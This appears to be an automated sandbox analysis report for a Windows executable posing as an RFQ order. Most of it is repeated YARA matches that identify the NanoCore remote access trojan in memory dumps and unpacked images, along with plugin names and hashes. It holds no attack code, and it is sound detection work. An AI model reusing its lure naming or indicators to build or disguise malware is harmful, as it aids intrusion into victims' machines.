Source: 18.2.#RFQ ORDER7678432213211.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.#RFQ ORDER7678432213211.exe.5944629.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.5840000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.5800000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.5830000.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.57f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.5844c9f.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.5630000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.5810000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.408d071.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.5800000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.5840000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.307f090.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.493425460.0000000005840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.493258723.00000000057F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.493293452.0000000005800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.494090628.0000000006310000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.477033384.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.477033384.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000002.493236087.00000000057E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.493731765.0000000005940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.493399369.0000000005830000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.492994566.0000000005630000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.493334722.0000000005810000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: #RFQ ORDER7678432213211.exe PID: 1328, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: #RFQ ORDER7678432213211.exe PID: 1328, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Initial sample is a PE file and has a suspicious nameShow sources
Source: initial sampleStatic PE information: Filename: #RFQ ORDER7678432213211.exe
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_00A531B818_2_00A531B8
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_00A52ADF18_2_00A52ADF
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_0145E47118_2_0145E471
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_0145E48018_2_0145E480
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_0145BBD418_2_0145BBD4
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_0658803018_2_06588030
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_06588C4818_2_06588C48
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_06588D0618_2_06588D06
Source: #RFQ ORDER7678432213211.exe, 00000000.00000000.212779401.00000000002AC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSafeTypeNameParserHand.exeB vs #RFQ ORDER7678432213211.exe
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.485095538.0000000003078000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs #RFQ ORDER7678432213211.exe
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.479636748.0000000000B5C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSafeTypeNameParserHand.exeB vs #RFQ ORDER7678432213211.exe
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.494090628.0000000006310000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs #RFQ ORDER7678432213211.exe
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.493987708.00000000061E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs #RFQ ORDER7678432213211.exe
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.490625846.0000000004081000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs #RFQ ORDER7678432213211.exe
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.495135748.00000000070B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs #RFQ ORDER7678432213211.exe
Source: #RFQ ORDER7678432213211.exeBinary or memory string: OriginalFilenameSafeTypeNameParserHand.exeB vs #RFQ ORDER7678432213211.exe
Source: #RFQ ORDER7678432213211.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 18.2.#RFQ ORDER7678432213211.exe.6310000.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.6310000.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.57f0000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.57f0000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5830000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5830000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.6310000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.6310000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.57e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.57e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5810000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5810000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.584e8a4.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.584e8a4.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 18.2.#RFQ ORDER7678432213211.exe.5944629.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5944629.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5840000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5840000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5800000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5800000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5830000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5830000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.57f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.57f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5844c9f.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5844c9f.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5630000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5630000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5810000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5810000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.408d071.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.408d071.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5800000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5800000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5840000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5840000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.307f090.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.307f090.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.493425460.0000000005840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.493425460.0000000005840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.493258723.00000000057F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.493258723.00000000057F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.493293452.0000000005800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.493293452.0000000005800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.494090628.0000000006310000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.494090628.0000000006310000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
